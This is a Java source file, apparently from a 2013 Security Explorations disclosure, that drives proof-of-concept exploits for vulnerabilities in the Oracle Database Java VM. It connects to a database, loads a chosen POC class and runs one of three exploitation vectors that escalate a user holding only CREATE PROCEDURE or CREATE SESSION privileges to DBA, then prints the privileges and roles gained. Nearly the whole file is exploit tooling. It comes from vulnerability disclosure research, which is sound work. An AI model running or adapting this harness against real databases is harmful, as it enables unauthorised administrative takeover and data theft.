/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* OraDBJVM                                                                   */
/* multiple vulnerabilities in Oracle Database Java VM implementation         */
/* usage: ORADBJVM db_connection db_user db_pass poc_idx expvec               */
/*    db_connection  - descriptor for Oracle database connection              */
/*    db_user        - db username                                            */
/*    db_pass        - db password                                            */
/*    poc_idx        - index of POC code to run                               */
/*    expvec         - denotes a desired exploitation vector:                 */ 
/*                     e1 - run with CREATE PROCEDURE privilege, exec sqlplus */
/*                          command to gain DBA access                        */
/*                     e2 - run with CREATE PROCEDURE privilege, spoof system */
/*                          definer frame to gain DBA access                  */
/*                     e3 - run with CREATE SESSION privilege, abuse existing */
/*                          system definer class to gain DBA access           */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.io.*;
import java.sql.*;
import oracle.jdbc.driver.OracleConnection;

public class OraDBJVM {
  public static String DB_CONNECTION = "jdbc:oracle:thin:@//10.0.0.2:1521/orcl";

  public static String DB_USER       = "seuser";
  public static String DB_PASS       = "sepass";

  public static void usage() {
    System.out.println("usage: ORADBJVM db_connection db_user db_pass poc_idx expvec");
    System.exit(0);
  }

  public static void error(String s) {
    System.out.println("error: "+s);
    System.exit(0);
  }

  private static String process_dbver(int ver) {
   String dbver=null;

   switch(ver) {
    case 11:
     dbver="11g";
     break;
    case 12:
     dbver="12c";
     break;
   }

   return dbver;
  }

  private static String process_poc(String dbver,String poc) throws Exception {
   String poc_class=null;
   int poc_idx=-1;

   try {
    poc_idx=Integer.parseInt(poc);
   } catch(Throwable t) {}    

   if (poc_idx>0) {
    try {
     ClassLoader cl=Thread.currentThread().getContextClassLoader();
     String cname=dbver+File.separator+"POC"+poc_idx+".dat";
     InputStream is=cl.getResourceAsStream(cname);
     if (is!=null) poc_class="POC"+poc_idx;
    } catch(Throwable t) {}
   }

   return poc_class;  
  }

  private static int process_expvec(String expvec) throws Exception {
   if (expvec.equals("e1")) return 0;
    else
   if (expvec.equals("e2")) return 1;
    else
   if (expvec.equals("e3")) return 2;
    else return -1;
  }

  public static void main(String[] args) throws Exception {
   try {
    if (args.length!=5) usage();

    String DB_CONNECTION=args[0];       
    String DB_USER=args[1];       
    String DB_PASS=args[2];       
    String poc=args[3];
    String expvec=args[4];

    Connection conn=SQL.init(DB_CONNECTION,DB_USER,DB_PASS,System.out);
    if (conn==null) error("cannot open database connection");

    int ver=((OracleConnection)conn).getVersionNumber()/1000;

    String dbver=process_dbver(ver);
    if (dbver==null) error("invalid db version");

    String poc_class=process_poc(dbver,poc);
    if (poc_class==null) error("invalid POC index");

    int expvec_idx=process_expvec(expvec);
    if (expvec_idx<0) error("invalid exploitation vector");

    String info="";

    switch(expvec_idx) {
     case 0:
      expvec="CREATE PROCEDURE priv / exec sqlplus";
      break;
     case 1:
      expvec="CREATE PROCEDURE priv / spoof definer";
      break;
     case 2:
      expvec="CREATE SESSION priv / spoof definer";
      break;
    }

    System.out.println("- running "+poc_class+" through \""+expvec+"\" exp. vector (db ver."+dbver+")");

    SQL.select(conn,"select BANNER from SYS.V_$VERSION");
    SQL.select(conn,"select * from session_privs");
    SQL.select(conn,"select * from session_roles");

    SQL.select(conn,"select * from product_component_version");

    Exploit.run(conn,dbver,poc_class,expvec_idx,System.out);

    conn=SQL.init(DB_CONNECTION,DB_USER,DB_PASS,System.out);
    SQL.select(conn,"select * from session_privs");
    SQL.select(conn,"select * from session_roles");
   } catch(Throwable t) {}
  }
}
